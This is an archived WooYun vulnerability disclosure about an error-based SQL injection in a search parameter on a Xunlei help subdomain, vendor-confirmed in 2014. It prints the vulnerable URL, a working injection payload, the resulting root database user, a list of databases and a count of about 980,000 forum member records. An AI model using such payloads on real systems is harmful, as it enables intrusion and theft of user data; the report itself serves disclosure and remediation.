当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087559

漏洞标题:迅雷分站MySQL报错注入(root权限)98万BBS用户信息

相关厂商:迅雷

漏洞作者: lijiejie

提交时间:2014-12-17 17:45

修复时间:2015-01-31 17:46

公开时间:2015-01-31 17:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:14

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-17: 细节已通知厂商并且等待厂商处理中
2014-12-18: 厂商已经确认,细节仅向厂商公开
2014-12-28: 细节向核心白帽子及相关领域专家公开
2015-01-07: 细节向普通白帽子公开
2015-01-17: 细节向实习白帽子公开
2015-01-31: 细节向公众公开

简要描述:

迅雷分站MySQL报错注入(root权限),98万BBS用户信息

详细说明:

注入点:

dynamic.help.xunlei.com/getArticlesBySearch.do?callback=jsonp1418799470192&searchstr=aaaa&_=1418799470273


参数searchstr可注入。 SQL查询可报错。

漏洞证明:

dynamic.help.xunlei.com/getArticlesBySearch.do?callback=jsonp1418799470192&searchstr='and(select 1 from(select count(*),concat((select concat(0x5e5e5e,user(),0x5e5e5e) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'&_=1418799470273


得到user():

root@127.0.0.1


xunlei.com_3.png


当前库: xlhelp2
所有库:

[*] bbs
[*] cued
[*] expire_msg_stat
[*] gbbs
[*] information_schema
[*] kk_stat
[*] lightmagic
[*] mysql
[*] offlinemsg_0
[*] offlinemsg_1
[*] offlinemsg_2
[*] offlinemsg_3
[*] offlinemsg_4
[*] offlinemsg_5
[*] offlinemsg_6
[*] offlinemsg_7
[*] offlinemsg_8
[*] offlinemsg_9
[*] question
[*] stat_cnc
[*] stat_dc_cnc
[*] stat_dc_tel
[*] stat_tele
[*] test
[*] uc
[*] user_0
[*] user_1
[*] user_10
[*] user_11
[*] user_12
[*] user_13
[*] user_14
[*] user_15
[*] user_16
[*] user_17
[*] user_18
[*] user_19
[*] user_2
[*] user_20
[*] user_21
[*] user_22
[*] user_23
[*] user_24
[*] user_25
[*] user_26
[*] user_27
[*] user_28
[*] user_29
[*] user_3
[*] user_30
[*] user_31
[*] user_32
[*] user_33
[*] user_34
[*] user_35
[*] user_36
[*] user_37
[*] user_38
[*] user_39
[*] user_4
[*] user_40
[*] user_41
[*] user_42
[*] user_43
[*] user_44
[*] user_45
[*] user_46
[*] user_47
[*] user_48
[*] user_49
[*] user_5
[*] user_50
[*] user_51
[*] user_52
[*] user_53
[*] user_54
[*] user_55
[*] user_56
[*] user_57
[*] user_58
[*] user_59
[*] user_6
[*] user_60
[*] user_61
[*] user_62
[*] user_63
[*] user_64
[*] user_65
[*] user_66
[*] user_67
[*] user_68
[*] user_69
[*] user_7
[*] user_70
[*] user_71
[*] user_72
[*] user_73
[*] user_74
[*] user_75
[*] user_76
[*] user_77
[*] user_78
[*] user_79
[*] user_8
[*] user_80
[*] user_81
[*] user_82
[*] user_83
[*] user_84
[*] user_85
[*] user_86
[*] user_87
[*] user_88
[*] user_89
[*] user_9
[*] user_90
[*] user_91
[*] user_92
[*] user_93
[*] user_94
[*] user_95
[*] user_96
[*] user_97
[*] user_98
[*] user_99
[*] xlcidmb
[*] xlcs
[*] xldc
[*] xlhelp
[*] xlhelp2
[*] xlkeyword


bbs库账号98万枚:

Database: bbs
+------------+---------+
| Table | Entries |
+------------+---------+
| pw_members | 983467 |
+------------+---------+


其他的几个库没仔细看,
但是user分了100个库,到底有多少用户数据,我未计算。

修复方案:

参数过滤

版权声明:转载请注明来源 lijiejie@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-12-18 15:36

厂商回复:

属于迅雷客服应用及客户服务数据。根据迅雷风险评估定级标准,等级定为中。

最新状态:

2014-12-18:请漏洞作者邮件联系 我爱乌云xunlei.com 获取奖励。

2014-12-18:邮箱地址被系统替换了。 是 security at xunlei.com